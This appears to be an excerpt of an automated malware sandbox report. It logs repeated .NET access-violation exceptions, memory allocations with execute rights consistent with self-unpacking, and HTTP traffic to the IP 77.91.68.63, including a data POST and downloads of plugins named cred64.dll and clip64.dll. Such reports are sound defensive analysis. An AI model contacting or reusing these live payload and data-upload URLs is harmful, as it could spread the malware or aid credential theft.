__exception__ June 26, 2023, 9:53 a.m.	stacktrace: 0xa7e82b0 0xa7e8dbe 0xa7e8679 0xa7e39a5 0xa7e252c 0xa7e13d9 0x209d9ff 0x2097855 0x2096f0b 0x2093c6b 0x20935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72842652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7285264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72852e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72907610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72991dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72991e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72991f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7299416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa7e82f3 registers.esp: 35514828 registers.edi: 35515220 registers.eax: 0 registers.ebp: 35514836 registers.edx: 0 registers.ebx: 35517828 registers.esi: 39059588 registers.ecx: 44189280	1
__exception__ June 26, 2023, 9:53 a.m.	stacktrace: 0xa7e82b0 0xa7e96ea 0xa7e9091 0xa7e398d 0xa7e2644 0xa7e13d9 0x209d9ff 0x2097855 0x2096f0b 0x2093c6b 0x20935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72842652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7285264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72852e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72907610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72991dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72991e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72991f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7299416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa7e82f3 registers.esp: 35514880 registers.edi: 35515220 registers.eax: 0 registers.ebp: 35514888 registers.edx: 0 registers.ebx: 35517828 registers.esi: 39059588 registers.ecx: 39128032	1
__exception__ June 26, 2023, 9:53 a.m.	stacktrace: 0xa7e82b0 0xa7e96ea 0xa7e9091 0xa7e39a5 0xa7e2644 0xa7e13d9 0x209d9ff 0x2097855 0x2096f0b 0x2093c6b 0x20935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72842652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7285264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72852e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72907610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72991dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72991e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72991f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7299416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa7e82f3 registers.esp: 35514880 registers.edi: 35515220 registers.eax: 0 registers.ebp: 35514888 registers.edx: 0 registers.ebx: 35517828 registers.esi: 39050568 registers.ecx: 40521956	1
__exception__ June 26, 2023, 9:53 a.m.	stacktrace: 0xa7e82b0 0xa7e96ea 0xa7e9091 0xa7e39a5 0xa7e2644 0xa7e13d9 0x209d9ff 0x2097855 0x2096f0b 0x2093c6b 0x20935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72842652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7285264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72852e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72907610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72991dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72991e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72991f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7299416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa7e82f3 registers.esp: 35514880 registers.edi: 35515220 registers.eax: 0 registers.ebp: 35514888 registers.edx: 0 registers.ebx: 35517828 registers.esi: 39050568 registers.ecx: 41915592	1
__exception__ June 26, 2023, 9:53 a.m.	stacktrace: 0xa7e82b0 0xa7e9dfc 0xa7e9859 0xa7e398d 0xa7e274a 0xa7e13d9 0x209d9ff 0x2097855 0x2096f0b 0x2093c6b 0x20935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72842652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7285264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72852e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72907610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72991dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72991e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72991f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7299416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa7e82f3 registers.esp: 35514912 registers.edi: 35515220 registers.eax: 0 registers.ebp: 35514920 registers.edx: 0 registers.ebx: 35517828 registers.esi: 39050568 registers.ecx: 43309376	1
__exception__ June 26, 2023, 9:53 a.m.	stacktrace: 0xa7e82b0 0xa7e9dfc 0xa7e9859 0xa7e39a5 0xa7e274a 0xa7e13d9 0x209d9ff 0x2097855 0x2096f0b 0x2093c6b 0x20935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72842652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7285264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72852e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72907610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72991dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72991e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72991f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7299416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa7e82f3 registers.esp: 35514912 registers.edi: 35515220 registers.eax: 0 registers.ebp: 35514920 registers.edx: 0 registers.ebx: 35517828 registers.esi: 39050568 registers.ecx: 39997128	1
__exception__ June 26, 2023, 9:53 a.m.	stacktrace: 0xa7e82b0 0xa7e9dfc 0xa7e9859 0xa7e39a5 0xa7e274a 0xa7e13d9 0x209d9ff 0x2097855 0x2096f0b 0x2093c6b 0x20935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72842652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7285264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72852e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72907610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72991dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72991e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72991f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7299416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa7e82f3 registers.esp: 35514912 registers.edi: 35515220 registers.eax: 0 registers.ebp: 35514920 registers.edx: 0 registers.ebx: 35517828 registers.esi: 39050568 registers.ecx: 41393400	1
__exception__ June 26, 2023, 9:53 a.m.	stacktrace: 0xa7e82b0 0xa7eb183 0xa7ea72e 0xa7e1431 0x209d9ff 0x2097855 0x2096f0b 0x2093c6b 0x20935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72842652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7285264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72852e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72907610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72991dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72991e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72991f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7299416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa7e82f3 registers.esp: 35515732 registers.edi: 35515996 registers.eax: 0 registers.ebp: 35515740 registers.edx: 0 registers.ebx: 35517828 registers.esi: 41962308 registers.ecx: 41969284	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://77.91.68.63/doma/net/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.63/doma/net/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.63/doma/net/Plugins/clip64.dll

Performs some HTTP requests (3 events)

request	POST http://77.91.68.63/doma/net/index.php
request	GET http://77.91.68.63/doma/net/Plugins/cred64.dll
request	GET http://77.91.68.63/doma/net/Plugins/clip64.dll

Sends data using the HTTP POST Method (1 event)

request

POST http://77.91.68.63/doma/net/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 129 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 1680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2136 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74601000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2136 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f51000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f31000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 region_size: 851968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00aa0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f22000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 region_size: 917504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00dc0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00e60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73522000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e9b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 region_size: 917504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02350000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00842000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a75000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a7b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a77000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0085c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73dca000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0084a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a6a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a67000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c71000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a66000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d4f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f31000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ff0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f22000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 region_size: 1638400 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02330000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e82000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e9b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72841000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72842000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 region_size: 524288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ff0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 26, 2023, 9:52 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
